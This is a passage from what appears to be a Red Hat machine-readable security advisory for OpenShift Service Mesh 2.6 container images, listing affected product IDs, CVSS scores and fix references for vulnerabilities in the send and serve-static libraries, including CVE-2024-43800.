"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", 